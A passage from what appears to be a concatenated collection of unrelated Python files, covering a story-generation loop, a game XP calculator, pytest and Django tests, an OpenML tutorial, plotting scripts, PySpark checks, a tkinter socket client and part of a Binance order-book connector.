events to find the next event in the story-->") results, h, c = seq2seq_model.pipeline_predict([event], h, c, start=True) #find a consistent one action, env = getAction(config, env, results, memory, history) if not action: print("</step>\n<final_story>"+str(print_history)+"</final_story>\n</story>") break if type(action) == tuple: event = action[0] else: event = action memory.add_event(event) history.append(event) print_event, filled_event, memory = prepToPrint(copy.deepcopy(event), memory) print("<selectedEvent>"+print_event+ "</selectedEvent>") print("<filledEvent>\n<!--An example of the event, randomly filled with real words-->\n"+str(filled_event)+"</filledEvent>") print_history.append(filled_event) print("<story_so_far>"+str(print_history)+"</story_so_far>") sentence = getSentence(filled_event, event, sentence_memory) if not sentence: print("<error> Can't turn event "+str(filled_event)+" into a sentence. </error>") break sentence_memory.append(sentence) print("</step>") print("<final_story>"+str(sentence_memory)+"</final_story>") print("</story>")
python
usrLvl = int(input("What level are you right now (1-50)?")) usrXP = int(input("What is your XP count right now?")) usrPrs = int(input("What prestige are you right now (0-10)?")) usr20 = str(input("Are you a Kamado (write \"y\" or \"n\")?")) usr10 = str(input("Are you a Tokito or Ubuyashiki (write \"y\" or \"n\")?")) xpMod = int(input("What is the current XP modifier (1 for default)?")) if(usrLvl==1): baseXP = (142058-0) elif(usrLvl==2): baseXP = (142058-132) elif(usrLvl==3): baseXP = (142058-271) elif(usrLvl==4): baseXP = (142058-421) elif(usrLvl==5): baseXP = (142058-587) elif(usrLvl==6): baseXP = (142058-773) elif(usrLvl==7): baseXP = (142058-985) elif(usrLvl==8): baseXP = (142058-1228) elif(usrLvl==9): baseXP = (142058-1508) elif(usrLvl==10): baseXP = (142058-1831) elif(usrLvl==11): baseXP = (142058-2204) elif(usrLvl==12): baseXP = (142058-2633) elif(usrLvl==13): baseXP = (142058-3125) elif(usrLvl==14): baseXP = (142058-3687) elif(usrLvl==15): baseXP = (142058-4327) elif(usrLvl==16): baseXP = (142058-5051) elif(usrLvl==17): baseXP = (142058-5868) elif(usrLvl==18): baseXP = (142058-6785) elif(usrLvl==19): baseXP = (142058-7810) elif(usrLvl==20): baseXP = (142058-8951) elif(usrLvl==21): baseXP = (142058-10216) elif(usrLvl==22): baseXP = (142058-11614) elif(usrLvl==23): baseXP = (142058-13152) elif(usrLvl==24): baseXP = (142058-14840) elif(usrLvl==25): baseXP = (142058-16686) elif(usrLvl==26): baseXP = (142058-18700) elif(usrLvl==27): baseXP = (142058-20890) elif(usrLvl==28): baseXP = (142058-23265) elif(usrLvl==29): baseXP = (142058-25834) elif(usrLvl==31): baseXP = (142058-28607) elif(usrLvl==32): baseXP = (142058-31593) elif(usrLvl==33): baseXP = (142058-34802) elif(usrLvl==34): baseXP = (142058-38243) elif(usrLvl==35): baseXP = (142058-41926) elif(usrLvl==36): baseXP = (142058-50057) elif(usrLvl==37): baseXP = (142058-54525) elif(usrLvl==38): baseXP = (142058-59275) elif(usrLvl==39): baseXP = (142058-64317) elif(usrLvl==40): baseXP = (142058-69661) elif(usrLvl==41): baseXP = (142058-75318) elif(usrLvl==42): baseXP = (142058-81298) elif(usrLvl==43): baseXP = (142058-87612) elif(usrLvl==44): baseXP = (142058-94270) elif(usrLvl==45): baseXP = (142058-101283) elif(usrLvl==46): baseXP = (142058-108662) elif(usrLvl==47): baseXP = (142058-116418) elif(usrLvl==48): baseXP = (142058-124562) elif(usrLvl==49): baseXP = (142058-133105) elif(usrLvl==50): baseXP = (142058-142058) elif(usrLvl>50): baseXP = (142058-142058) print("You are already higher than level 50, you don't need any more experience to prestige.") elif(usrLvl<1): print("You entered an impossible level.") baseXP = null if(usr20=="y"): familyXP = 0.2 elif(usr10=="y"): familyXP = 0.1 elif(usr10!="y" + usr20!="y"): familyXP = 0.0 rqrXP = ((baseXP-usrXP)/((baseXP-usrXP)*(xpMod + familyXP+(usrPrs*0.2+1)))*(baseXP-usrXP)) displayXP = int(rqrXP) print("You need " + str(displayXP) + "EXP in order to get to level 50.") print("You need to do " + str((rqrXP//21000) + (0 < rqrXP%21000)) + " (" + str(round((rqrXP/21000),2)) + ")" + " infinity castles (assuming you beat all bosses and grip no demons) to get to level 50.") print("You need to do " + str((rqrXP//6000) + (0 < rqrXP%6000)) + " (" + str(round((rqrXP/6000),2)) + ")" + " Kaigakus in order to get to level 50.") print("You need to do " + str((rqrXP//300) + (0 < rqrXP%300)) + " (" + str(round((rqrXP/300),2)) + ")" + " Zenitsus in order to get to level 50.")
python
import math import os import pytest import torch from tests import _PATH_DATA @pytest.mark.skipif(not os.path.exists(_PATH_DATA), reason="Data files not found") def test_load_traindata(): dataset = torch.load(f"{_PATH_DATA}/processed/train.pt") assert len(dataset) == math.ceil(25000 / 64) @pytest.mark.skipif(not os.path.exists(_PATH_DATA), reason="Data files not found") def test_load_testdata(): dataset = torch.load(f"{_PATH_DATA}/processed/test.pt") assert len(dataset) == math.ceil(5000 / 64)
python
""" ==================== Fetching Evaluations ==================== Evalutions contain a concise summary of the results of all runs made. Each evaluation provides information on the dataset used, the flow applied, the setup used, the metric evaluated, and the result obtained on the metric, for each such run made. These collection of results can be used for efficient benchmarking of an algorithm and also allow transparent reuse of results from previous experiments on similar parameters. In this example, we shall do the following: * Retrieve evaluations based on different metrics * Fetch evaluations pertaining to a specific task * Sort the obtained results in descending order of the metric * Plot a cumulative distribution function for the evaluations * Compare the top 10 performing flows based on the evaluation performance * Retrieve evaluations with hyperparameter settings """ ############################################################################ import openml ############################################################################ # Listing evaluations # ******************* # Evaluations can be retrieved from the database in the chosen output format. # Required filters can be applied to retrieve results from runs as required. # We shall retrieve a small set (only 10 entries) to test the listing function for evaluations openml.evaluations.list_evaluations(function='predictive_accuracy', size=10, output_format='dataframe') # Using other evaluation metrics, 'precision' in this case evals = openml.evaluations.list_evaluations(function='precision', size=10, output_format='dataframe') # Querying the returned results for precision above 0.98 print(evals[evals.value > 0.98]) ############################################################################# # Viewing a sample task # ===================== # Over here we shall briefly take a look at the details of the task. # We will start by displaying a simple *supervised classification* task: task_id = 167140 # https://www.openml.org/t/167140 task = openml.tasks.get_task(task_id) print(task) ############################################################################# # Obtaining all the evaluations for the task # ========================================== # We'll now obtain all the evaluations that were uploaded for the task # we displayed previously. # Note that we now filter the evaluations based on another parameter 'task'. metric = 'predictive_accuracy' evals = openml.evaluations.list_evaluations(function=metric, task=[task_id], output_format='dataframe') # Displaying the first 10 rows print(evals.head(n=10)) # Sorting the evaluations in decreasing order of the metric chosen evals = evals.sort_values(by='value', ascending=False) print("\nDisplaying head of sorted dataframe: ") print(evals.head()) ############################################################################# # Obtaining CDF of metric for chosen task # *************************************** # We shall now analyse how the performance of various flows have been on this task, # by seeing the likelihood of the accuracy obtained across all runs. # We shall now plot a cumulative distributive function (CDF) for the accuracies obtained. from matplotlib import pyplot as plt def plot_cdf(values, metric='predictive_accuracy'): max_val = max(values) n, bins, patches = plt.hist(values, density=True, histtype='step', cumulative=True, linewidth=3) patches[0].set_xy(patches[0].get_xy()[:-1]) plt.xlim(max(0, min(values) - 0.1), 1) plt.title('CDF') plt.xlabel(metric) plt.ylabel('Likelihood') plt.grid(b=True, which='major', linestyle='-') plt.minorticks_on() plt.grid(b=True, which='minor', linestyle='--') plt.axvline(max_val, linestyle='--', color='gray') plt.text(max_val, 0, "%.3f" % max_val, fontsize=9) plt.show() plot_cdf(evals.value, metric) # This CDF plot shows that for the given task, based on the results of the # runs uploaded, it is almost certain to achieve an accuracy above 52%, i.e., # with non-zero probability. While the maximum accuracy seen till now is 96.5%. ############################################################################# # Comparing top 10 performing flows # ********************************* # Let us now try to see which flows generally performed the best for this task. # For this, we shall compare the top performing flows. import numpy as np import pandas as pd def plot_flow_compare(evaluations, top_n=10, metric='predictive_accuracy'): # Collecting the top 10 performing unique flow_id flow_ids = evaluations.flow_id.unique()[:top_n] df = pd.DataFrame() # Creating a data frame containing only the metric values of the selected flows # assuming evaluations is sorted in decreasing order of metric for i in range(len(flow_ids)): flow_values = evaluations[evaluations.flow_id == flow_ids[i]].value df = pd.concat([df, flow_values], ignore_index=True, axis=1) fig, axs = plt.subplots() df.boxplot() axs.set_title('Boxplot comparing ' + metric + ' for different flows') axs.set_ylabel(metric) axs.set_xlabel('Flow ID') axs.set_xticklabels(flow_ids) axs.grid(which='major', linestyle='-', linewidth='0.5', color='gray', axis='y') axs.minorticks_on() axs.grid(which='minor', linestyle='--', linewidth='0.5', color='gray', axis='y') # Counting the number of entries for each flow in the data frame # which gives the number of runs for each flow flow_freq = list(df.count(axis=0, numeric_only=True)) for i in range(len(flow_ids)): axs.text(i + 1.05, np.nanmin(df.values), str(flow_freq[i]) + '\nrun(s)', fontsize=7) plt.show() plot_flow_compare(evals, metric=metric, top_n=10) # The boxplots below show how the flows perform across multiple runs on the chosen # task. The green horizontal lines represent the median accuracy of all the runs for # that flow (number of runs denoted at the bottom of the boxplots). The higher the # green line, the better the flow is for the task at hand. The ordering of the flows # are in the descending order of the higest accuracy value seen under that flow. # Printing the corresponding flow names for the top 10 performing flow IDs top_n = 10 flow_ids = evals.flow_id.unique()[:top_n] flow_names = evals.flow_name.unique()[:top_n] for i in range(top_n): print((flow_ids[i], flow_names[i])) ############################################################################# # Obtaining evaluations with hyperparameter settings # ================================================== # We'll now obtain the evaluations of a task and a flow with the hyperparameters # List evaluations in descending order based on predictive_accuracy with # hyperparameters evals_setups = openml.evaluations.list_evaluations_setups(function='predictive_accuracy', task=[31], size=100, sort_order='desc') "" print(evals_setups.head()) "" # Return evaluations for flow_id in descending order based on predictive_accuracy # with hyperparameters. parameters_in_separate_columns returns parameters in # separate columns evals_setups = openml.evaluations.list_evaluations_setups(function='predictive_accuracy', flow=[6767], size=100, parameters_in_separate_columns=True) "" print(evals_setups.head(10)) ""
python
#!/usr/bin/python import numpy as np import matplotlib.pyplot as plt import matplotlib import argparse def plot_err_cdf(data1, data2): """draw cdf to see the error between without/with freeze""" err_data = [] for x, y in zip(data1, data2): err_data.append(abs(x-y)) sorted_err_data = np.sort(err_data) cdf_err = np.arange(len(sorted_err_data)) / float(len(sorted_err_data)) avg = np.mean(data1) variance = [] for x in data1: variance.append(abs(x-avg)) num_bins = 5000 counts, bin_edges = np.histogram(variance, bins=num_bins) cdf_variance = np.cumsum(counts) / float(len(variance)) xlim_min = min(min(err_data), min(variance)) xlim_max = max(max(err_data), max(variance)) plt.figure() # plt.xlim(0.99 * xlim_min, 1.02 * xlim_max) # plt.xlim(0, 5000) p1 = plt.plot(sorted_err_data, cdf_err, 'b', label=label_err) p2 = plt.plot(bin_edges[1:], cdf_variance, 'r', label='Variance of GTOD') plt.legend() #(loc='lower right') plt.xlabel('Time Error (Milliseconds)', fontsize=20) plt.ylabel('Cumulative Distribution', fontsize=20) plt.grid(True) # plt.show() plt.savefig('err_%s_cdf.eps' % topic_name, format='eps') def plot_compare_cdf(data1, data2): """draw cdf to compare without/with freeze elapsed time""" num_bins = 5000 counts1, bin_edges1 = np.histogram(data1, bins=num_bins) cdf1 = np.cumsum(counts1) / float(len(data1)) counts2, bin_edges2 = np.histogram(data2, bins=num_bins) cdf2 = np.cumsum(counts2) / float(len(data2)) xlim_min = min(min(data1), min(data2)) xlim_max = max(max(data1), max(data2)) plt.figure() # plt.xlim(0.98 * xlim_min, 1.02 * xlim_max) # plt.xlim(65000, 70000) p1 = plt.plot(bin_edges1[1:], cdf1, 'b', label=label1) p2 = plt.plot(bin_edges2[1:], cdf2, 'r', label=label2) plt.legend() #(loc='lower right') plt.xlabel('PING RTT / Milliseconds', fontsize=20) plt.ylabel('Cumulative Distribution', fontsize=20) plt.grid(True) # plt.show() plt.savefig('cmp_%s_cdf.eps' % topic_name, format='eps') def plot_variance_cdf(data): avg = np.mean(data) variance = [] for x in data: variance.append(abs(x-avg)) num_bins = 10 counts, bin_edges = np.histogram(variance, bins=num_bins) cdf = np.cumsum(counts) / float(len(variance)) xlim_min = min(variance) xlim_max = max(variance) plt.figure() plt.xlim(0.99 * xlim_min, 1.02 * xlim_max) p = plt.plot(bin_edges[1:], cdf, 'b', label='Variance of GTOD') plt.legend(loc='lower right') plt.xlabel('Absolute Variance / Microseconds', fontsize=20) plt.ylabel('Cumulative Distribution', fontsize=20) plt.grid(True) #plt.show() plt.savefig('var_%s_cdf.eps' % topic_name, format='eps') def main(): """draw 2 cdf figures""" data1 = np.loadtxt(bsl_file) data2 = np.loadtxt(vir_file) font = {'size':16} matplotlib.rc('lines', lw=2) matplotlib.rc('font', **font) plot_compare_cdf(data1, data2) plot_err_cdf(data1, data2) if __name__ == "__main__": parser = argparse.ArgumentParser() parser.add_argument('-b', '--bsl_file', action='store') parser.add_argument('-v', '--vir_file', action='store') parser.add_argument('-d', '--dilation', action='store', default=1, type=int) parser.add_argument('--label1', action='store') parser.add_argument('--label2', action='store') parser.add_argument('--label_err', action='store', default='Abs Error') parser.add_argument('--topic_name', action='store') results = parser.parse_args() bsl_file = results.bsl_file vir_file = results.vir_file dilation = results.dilation label1 = results.label1 label2 = results.label2 topic_name = results.topic_name label_err = results.label_err main()
python
from datetime import timedelta from django.test import TestCase from django.core.exceptions import ValidationError from django.utils import timezone from url_shortener.links.models import Link class LinkTest(TestCase): def create_link(self, expires_at=None, short_url="asdf", full_url="https://google.com"): return Link.objects.create(short_url=short_url, full_url=full_url, expires_at=expires_at) def test_creation_of_link(self): link = self.create_link() assert isinstance(link, Link) def test_has_expired(self): yesterday = timezone.now() - timedelta(days=1) link = self.create_link(expires_at=yesterday) assert link.has_expired tomorrow = timezone.now() + timedelta(days=1) link_2 = self.create_link(expires_at=tomorrow, short_url="banan") assert not link_2.has_expired
python
import configparser from datetime import datetime import os import sys from pyspark.sql import SparkSession from pyspark.sql.functions import count from pyspark.sql.types import DateType def create_spark_session(): spark = SparkSession \ .builder \ .config("spark.jars.packages", "org.apache.hadoop:hadoop-aws:2.7.0") \ .getOrCreate() return spark def check_music_data(spark, datalake_bucket): music_df = spark.read.parquet(os.path.join(datalake_bucket, 'music_table/*.parquet')) if music_df.count() == 0: raise AssertionError('Music table is empty.') if music_df.where(col("track_id").isNull()): raise AssertionError('Primary key cannot be null.') def check_lyrics_data(spark, datalake_bucket): lyrics_df = spark.read.parquet(os.path.join(datalake_bucket, 'lyrics_table/*.parquet')) if lyrics_df.count() == 0: raise AssertionError('Lyrics table is empty.') if lyrics_df.select(F.countDistinct("track_name")) != lyrics_df.select(F.count("track_name")): raise AssertionError('Primary key should be unique.') def check_track_data(spark, datalake_bucket): track_df = spark.read.parquet(os.path.join(datalake_bucket, 'track_table/*.parquet')) if track_df.count() == 0: raise AssertionError('Track table is empty.') if dict(track_df.dtypes)[count_words] != 'int': raise AssertionError('Data type mis-match.') def check_song_data(spark, datalake_bucket): song_df = spark.read.parquet(os.path.join(datalake_bucket, 'song_table/*.parquet')) if song_df.count() == 0: raise AssertionError('Song table is empty.') def check_artists_data(spark, datalake_bucket): artists_df = spark.read.parquet(os.path.join(datalake_bucket, 'artists_table/*.parquet')) if artists_df.count() == 0: raise AssertionError('Artists table is empty.') def check_features_data(spark, datalake_bucket): features_df = spark.read.parquet(os.path.join(datalake_bucket, 'features_table/*.parquet')) if features_df.count() == 0: raise AssertionError('Aeatures table is empty.') def main(): if len(sys.argv) == 2: datalake_bucket = sys.argv[1] else: config = configparser.ConfigParser() config.read('../dl.cfg') os.environ['AWS_ACCESS_KEY_ID'] = config['AWS']['AWS_ACCESS_KEY_ID'] os.environ['AWS_SECRET_ACCESS_KEY'] = config['AWS']['AWS_SECRET_ACCESS_KEY'] datalake_bucket = 's3a://' + config['S3']['BIKESHARE_DATALAKE_BUCKET'] + '/' spark = create_spark_session() check_music_data(spark, datalake_bucket) check_lyrics_data(spark, datalake_bucket) check_track_data(spark, datalake_bucket) check_song_data(spark, datalake_bucket) check_features_data(spark, datalake_bucket) if __name__ == "__main__": main()
python
from src.loader.interface import ILoader from src.loader.impl import DataLoader
python
#!/usr/bin/python import sys, re import fabric.docs import fabric, simplejson, inspect, pprint from lib import fabfile action_dir = "./" def generate_meta(fabfile): for i in dir(fabfile): action_meta = {} fabtask = getattr(fabfile,i) if isinstance(fabtask,fabric.tasks.WrappedCallableTask): print "%s is a Fabric Callable Task..." % i fabparams = getArgs(i,fabfile) print "\n" try: action_meta['name'] = fabtask.wrapped.func_name action_meta['description'] = fabtask.wrapped.func_doc except TypeError, e: print e next action_meta['entry_point'] = "fabaction.py" action_meta['runner_type'] = "run-local-script" action_meta['enabled'] = True parameters = {} parameters['kwarg_op'] = {"immutable": True, "type": "string", "default": ""} parameters['user'] = {"immutable": True} parameters['dir'] = {"immutable": True} parameters["task"] = { "type": "string", "description": "task name to be executed", "immutable": True, "default": fabtask.wrapped.func_name } if fabparams: parameters.update(fabparams) action_meta['parameters'] = parameters fname = action_dir + action_meta['name'] + ".json" try: print "Writing %s..." % fname fh = open(fname, 'w') fh.write(simplejson.dumps(action_meta,indent=2,sort_keys=True)) except: print "Could not write file %s" % fname next print "\n" def getArgs(task, fabfile): args = {} sourcelines = inspect.getsourcelines(fabfile)[0] for i, line in enumerate(sourcelines): line = line.rstrip() pattern = re.compile('def ' + task + '\(') if pattern.search(line): filtered = filter(None,re.split('\((.*)\):.*',line)) if len(filtered) < 2: return None argstring = filtered[1] for arg in argstring.split(','): if re.search('=',arg): arg,v = arg.split('=') if v == "''" or v == '""' or v == 'None': value={"type":"string"} else: value={"type":"string","default":v.strip()} else: value={"type":"string"} args[arg.strip()]=value return args generate_meta(fabfile)
python
from spike import PrimeHub hub = PrimeHub() while True: if hub.left_button.was_pressed(): print("Left button was Pressed") elif hub.right_button.was_pressed(): print("Right button was Pressed")
python
from distutils.core import setup import glob, os from osg_configure.version import __version__ def get_data_files(): """ Generates a list of data files for packaging and locations where they should be placed """ # create a list of test files fileList = [] for root, subFolders, files in os.walk('tests'): for name in files: fileList.append(os.path.join(root, name)) temp = filter(lambda x: '.svn' not in x, fileList) temp = filter(lambda x: not os.path.isdir(x), temp) temp = map(lambda x: (x.replace('tests', '/usr/share/osg-configure/tests', 1), x), temp) file_mappings = {} for (dest, source) in temp: dest_dir = os.path.dirname(dest) if dest_dir in file_mappings: file_mappings[dest_dir].append(source) else: file_mappings[dest_dir] = [source] data_file_list = [] for key in file_mappings: data_file_list.append((key, file_mappings[key])) # generate config file entries data_file_list.append(('/etc/osg/config.d', glob.glob('config/*.ini'))) # add grid3-locations file data_file_list.append(('/etc/osg/', ['data_files/grid3-locations.txt'])) return data_file_list setup(name='osg-configure', version=__version__, description='Package for osg-configure and associated scripts', author='Suchandra Thapa', maintainer='Matyas Selmeci', maintainer_email='[email protected]', url='http://www.opensciencegrid.org', packages=['osg_configure', 'osg_configure.modules', 'osg_configure.configure_modules'], scripts=['scripts/osg-configure'], data_files=get_data_files(), classifiers=[ "Development Status :: 6 - Mature", "Environment :: Console", "Intended Audience :: System Administrators", "License :: OSI Approved :: Apache Software License", "Operating System :: POSIX :: Linux", "Programming Language :: Python :: 3", "Programming Language :: Python :: 3.6", ], platforms=["Linux"], license="Apache Software License 2.0" )
python
import socket from tkinter import* #Python socket client by Jeferson Oliveira #ESSE É O CLIENTE ESSE CÓDIGO DEVER SER ADAPTADO NO PROJETO HOST = 'ip' #DEFINE O IP DO SERVIDOR PORT = 11000 tela = Tk() def LerComando(comando): if comando == "b1": botao['text'] = "1" def de(): #ESSA FUNÇÃO INFORMA QUE ESTÁ ONLINE AO SERVIDOR VAI RODAR EM LOOP EnviarMenssagem("on") tela.after(100, de) def EnviarMenssagem(msg): try: #PARA TRATAMENTO DE ERROS CLIENTE = socket.socket(socket.AF_INET, socket.SOCK_STREAM) CLIENTE.connect((HOST,PORT)) CLIENTE.sendall(str.encode(msg)) data = CLIENTE.recv(1024) print("Resposta do servidor:", data.decode()) CLIENTE.close() LerComando(data.decode()) data = "" except: CLIENTE.close() CLIENTE.close() #EXEMPLO COM UM BOTÃO===================== def btn1clique(): #MÉTODOPARA O CLIQUE DO BOTÃO botao['text'] = "1" #O TEXTO DO BOTÃO MUDARÁ PARA 1 EnviarMenssagem("b1")# ENVIA ESSA INFORMAÇÃO AO SERVIDOR SOCKET tela.title('Exemplo') #TITULO DA TELA DO FORMULARIO tela.geometry('720x500') #TAMANHO DA TELA botao = Button(tela, text=" ", command = lambda:btn1clique()) #CRIA UM BOTÃO QUE COM O EVENTO DE CLIQUE QUE MÉTODO btnclique() botao.grid()#DESENHA O BOTÃO NA TELA botao['width'] = 30 #DEFINE O TAMANHO HORIZONTAL DO BOTÃO botao['height'] = 20 #DEFEINE A ALTURA DO BOTÃO tela.after(100, de) tela.mainloop()# COLOCA O FORMULARIO EM LOOP PRINCIPAL
python
import asyncio import copy import logging import time from collections import defaultdict from decimal import Decimal from typing import Any, Dict, List, Mapping, Optional from bidict import bidict, ValueDuplicationError import hummingbot.connector.derivative.binance_perpetual.binance_perpetual_utils as utils import hummingbot.connector.derivative.binance_perpetual.binance_perpetual_web_utils as web_utils import hummingbot.connector.derivative.binance_perpetual.constants as CONSTANTS from hummingbot.connector.derivative.binance_perpetual.binance_perpetual_order_book import BinancePerpetualOrderBook from hummingbot.connector.time_synchronizer import TimeSynchronizer from hummingbot.connector.utils import combine_to_hb_trading_pair from hummingbot.core.api_throttler.async_throttler import AsyncThrottler from hummingbot.core.data_type.funding_info import FundingInfo from hummingbot.core.data_type.order_book import OrderBook from hummingbot.core.data_type.order_book_message import OrderBookMessage from hummingbot.core.data_type.order_book_tracker_data_source import OrderBookTrackerDataSource from hummingbot.core.utils.async_utils import safe_gather from hummingbot.core.web_assistant.connections.data_types import ( RESTMethod, WSRequest, WSResponse, ) from hummingbot.core.web_assistant.web_assistants_factory import WebAssistantsFactory from hummingbot.core.web_assistant.ws_assistant import WSAssistant from hummingbot.logger import HummingbotLogger class BinancePerpetualAPIOrderBookDataSource(OrderBookTrackerDataSource): _bpobds_logger: Optional[HummingbotLogger] = None _trading_pair_symbol_map: Dict[str, Mapping[str, str]] = {} _mapping_initialization_lock = asyncio.Lock() def __init__( self, trading_pairs: List[str] = None, domain: str = CONSTANTS.DOMAIN, throttler: Optional[AsyncThrottler] = None, api_factory: Optional[WebAssistantsFactory] = None, time_synchronizer: Optional[TimeSynchronizer] = None, ): super().__init__(trading_pairs) self._time_synchronizer = time_synchronizer self._domain = domain self._throttler = throttler self._api_factory: WebAssistantsFactory = api_factory or web_utils.build_api_factory( throttler=self._throttler, time_synchronizer=self._time_synchronizer, domain=self._domain, ) self._order_book_create_function = lambda: OrderBook() self._funding_info: Dict[str, FundingInfo] = {} self._message_queue: Dict[int, asyncio.Queue] = defaultdict(asyncio.Queue) @property def funding_info(self) -> Dict[str, FundingInfo]: return copy.deepcopy(self._funding_info) def is_funding_info_initialized(self) -> bool: return all(trading_pair in self._funding_info for trading_pair in self._trading_pairs) @classmethod def logger(cls) -> HummingbotLogger: if cls._bpobds_logger is None: cls._bpobds_logger = logging.getLogger(__name__) return cls._bpobds_logger @classmethod async def get_last_traded_prices(cls, trading_pairs: List[str], domain: str = CONSTANTS.DOMAIN) -> Dict[str, float]: tasks = [cls.get_last_traded_price(t_pair, domain) for t_pair in trading_pairs] results = await safe_gather(*tasks) return {t_pair: result for t_pair, result in zip(trading_pairs, results)} @classmethod async def get_last_traded_price(cls, trading_pair: str, domain: str = CONSTANTS.DOMAIN, api_factory: Optional[WebAssistantsFactory] = None, throttler: Optional[AsyncThrottler] = None, time_synchronizer: Optional[TimeSynchronizer] = None) -> float: params = {"symbol": await cls.convert_to_exchange_trading_pair( hb_trading_pair=trading_pair, domain=domain, throttler=throttler, api_factory=api_factory, time_synchronizer=time_synchronizer)} response = await web_utils.api_request( path=CONSTANTS.TICKER_PRICE_CHANGE_URL, api_factory=api_factory, throttler=throttler, time_synchronizer=time_synchronizer, domain=domain, params=params, method=RESTMethod.GET) return float(response["lastPrice"]) @classmethod def trading_pair_symbol_map_ready(cls, domain: str = CONSTANTS.DOMAIN): """ Checks if the mapping from exchange symbols to client trading pairs has been initialized :param domain: the domain of the exchange being used :return: True if the mapping has been initialized, False otherwise """ return domain in cls._trading_pair_symbol_map and len(cls._trading_pair_symbol_map[domain]) > 0 @classmethod async def trading_pair_symbol_map( cls, domain: Optional[str] = CONSTANTS.DOMAIN, throttler: Optional[AsyncThrottler] = None, api_factory: WebAssistantsFactory = None, time_synchronizer: Optional[TimeSynchronizer] = None ) -> Mapping[str, str]: if not cls.trading_pair_symbol_map_ready(domain=domain): async with cls._mapping_initialization_lock: # Check condition again (could have been initialized while waiting for the lock to be released) if not cls.trading_pair_symbol_map_ready(domain=domain): await cls.init_trading_pair_symbols(domain, throttler, api_factory, time_synchronizer) return cls._trading_pair_symbol_map[domain] @classmethod async def init_trading_pair_symbols( cls, domain: str = CONSTANTS.DOMAIN, throttler: Optional[AsyncThrottler] = None, api_factory: WebAssistantsFactory = None, time_synchronizer: Optional[TimeSynchronizer] = None ): """Initialize _trading_pair_symbol_map class variable""" mapping = bidict() try: data = await web_utils.api_request( path=CONSTANTS.EXCHANGE_INFO_URL, api_factory=api_factory, throttler=throttler, time_synchronizer=time_synchronizer, domain=domain, method=RESTMethod.GET, timeout=10) for symbol_data in filter(utils.is_exchange_information_valid, data["symbols"]): try: mapping[symbol_data["pair"]] = combine_to_hb_trading_pair( symbol_data["baseAsset"], symbol_data["quoteAsset"]) except ValueDuplicationError: continue except Exception as ex: cls.logger().exception(f"There was an error requesting exchange info ({str(ex)})") cls._trading_pair_symbol_map[domain] = mapping @staticmethod async def fetch_trading_pairs( domain: str = CONSTANTS.DOMAIN, throttler: Optional[AsyncThrottler] = None, api_factory: Optional[WebAssistantsFactory] = None, time_synchronizer: Optional[TimeSynchronizer] = None, ) -> List[str]: trading_pair_list: List[str] = [] symbols_map = await BinancePerpetualAPIOrderBookDataSource.trading_pair_symbol_map( domain=domain, throttler=throttler, api_factory=api_factory, time_synchronizer=time_synchronizer) trading_pair_list.extend(list(symbols_map.values())) return trading_pair_list @classmethod async def convert_from_exchange_trading_pair( cls, exchange_trading_pair: str, domain: str = CONSTANTS.DOMAIN, throttler: Optional[AsyncThrottler] = None, api_factory: Optional[WebAssistantsFactory] = None, time_synchronizer: Optional[TimeSynchronizer] = None) -> str: symbol_map = await cls.trading_pair_symbol_map( domain=domain, throttler=throttler, api_factory=api_factory, time_synchronizer=time_synchronizer) try: pair = symbol_map[exchange_trading_pair] except KeyError: raise ValueError(f"There is no symbol mapping for exchange trading pair {exchange_trading_pair}") return pair @classmethod async def convert_to_exchange_trading_pair( cls, hb_trading_pair: str, domain=CONSTANTS.DOMAIN, throttler: Optional[AsyncThrottler] = None, api_factory: Optional[WebAssistantsFactory] = None, time_synchronizer: Optional[TimeSynchronizer] = None) -> str: symbol_map = await cls.trading_pair_symbol_map( domain=domain, throttler=throttler, api_factory=api_factory, time_synchronizer=time_synchronizer) try: symbol = symbol_map.inverse[hb_trading_pair] except KeyError: raise ValueError(f"There is no symbol mapping for trading pair {hb_trading_pair}") return symbol @staticmethod async def get_snapshot( trading_pair: str, limit: int = 1000, domain: str = CONSTANTS.DOMAIN, throttler: Optional[AsyncThrottler] = None, api_factory: Optional[WebAssistantsFactory] = None, time_synchronizer: Optional[TimeSynchronizer] = None ) -> Dict[str, Any]: params = {"symbol": await BinancePerpetualAPIOrderBookDataSource.convert_to_exchange_trading_pair( hb_trading_pair=trading_pair, domain=domain, throttler=throttler, api_factory=api_factory, time_synchronizer=time_synchronizer)} if limit != 0: params.update({"limit": str(limit)}) data = await web_utils.api_request( path=CONSTANTS.SNAPSHOT_REST_URL, api_factory=api_factory, throttler=throttler, time_synchronizer=time_synchronizer, domain=domain, params=params, method=RESTMethod.GET) return data async def get_new_order_book(self, trading_pair: str) -> OrderBook: snapshot: Dict[str, Any] = await self.get_snapshot(trading_pair, 1000, self._domain, self._throttler, self._api_factory) snapshot_timestamp: float = time.time() snapshot_msg: OrderBookMessage = BinancePerpetualOrderBook.snapshot_message_from_exchange( snapshot, snapshot_timestamp, metadata={"trading_pair": trading_pair} ) order_book = self.order_book_create_function() order_book.apply_snapshot(snapshot_msg.bids, snapshot_msg.asks, snapshot_msg.update_id) return order_book async def _get_funding_info_from_exchange(self, trading_pair: str) -> FundingInfo: """ Fetches the funding information of the given trading pair from the exchange REST API. Parses and returns the respsonse as a FundingInfo data object. :param trading_pair: Trading pair of which its Funding Info is to be fetched :type trading_pair: str :return: Funding Information of the given trading pair :rtype: FundingInfo """ params = {"symbol": await self.convert_to_exchange_trading_pair( hb_trading_pair=trading_pair, domain=self._domain, throttler=self._throttler, api_factory=self._api_factory, time_synchronizer=self._time_synchronizer)} try: data = await web_utils.api_request( path=CONSTANTS.MARK_PRICE_URL, api_factory=self._api_factory, throttler=self._throttler, time_synchronizer=self._time_synchronizer, domain=self._domain, params=params, method=RESTMethod.GET) except asyncio.CancelledError: raise except Exception as exception: self.logger().exception(f"There was a problem getting funding info from exchange. Error: {exception}") return None funding_info = FundingInfo( trading_pair=trading_pair, index_price=Decimal(data["indexPrice"]), mark_price=Decimal(data["markPrice"]), next_funding_utc_timestamp=int(data["nextFundingTime"]), rate=Decimal(data["lastFundingRate"]), ) return funding_info async def get_funding_info(self, trading_pair: str) -> FundingInfo: """ Returns the FundingInfo of the specified trading pair. If it does not exist, it will query the REST API. """ if trading_pair not in self._funding_info: self._funding_info[trading_pair] = await self._get_funding_info_from_exchange(trading_pair) return self._funding_info[trading_pair] async def _subscribe_to_order_book_streams(self) -> WSAssistant: url = f"{web_utils.wss_url(CONSTANTS.PUBLIC_WS_ENDPOINT, self._domain)}" ws: WSAssistant = await self._api_factory.get_ws_assistant() await ws.connect(ws_url=url, ping_timeout=CONSTANTS.HEARTBEAT_TIME_INTERVAL) stream_id_channel_pairs = [ (CONSTANTS.DIFF_STREAM_ID, "@depth"), 